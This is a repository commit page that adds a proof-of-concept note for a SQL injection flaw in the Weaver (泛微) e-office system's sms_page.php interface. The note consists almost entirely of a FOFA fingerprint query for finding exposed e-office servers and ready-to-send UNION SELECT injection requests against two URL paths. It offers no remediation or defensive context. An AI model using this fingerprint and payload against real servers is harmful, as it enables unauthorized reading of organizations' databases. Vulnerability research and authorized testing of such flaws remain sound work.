admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-06-20 09:51:11 +00:00
Code Issues Packages Projects Releases Wiki Activity

Update 泛微e-office系统sms_page.php接口存在sql注入漏洞.md

Browse Source
This commit is contained in:
Nexolanta 2025-03-06 17:43:52 +08:00 committed by GitHub
parent beddedfab3
commit e39d0fc162
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 24 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

24
wpoc/泛微OA/泛微e-office系统sms_page.php接口存在sql注入漏洞.md
View File

@ -1 +1,25 @@
# 泛微e-office系统sms_page.php接口存在sql注入漏洞
泛微e-office系统在sms_page.php接口下存在sql注入漏洞
## fofa
```javascript
((header="general/login/index.php" || body="/general/login/view//images/updateLoad.gif" || (body="szFeatures" && body="eoffice") || header="Server: eOffice") && body!="Server: couchdb") || banner="general/login/index.php"
```
## poc
```javascript
GET /E-mobile/sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
Content-Type: application/json
Host: 127.0.0.1
GET /sms_page.php?detailid=123%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7e,md5(123),0x7e),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20- HTTP/1.1
Content-Type: application/json
Host: 127.0.0.1
```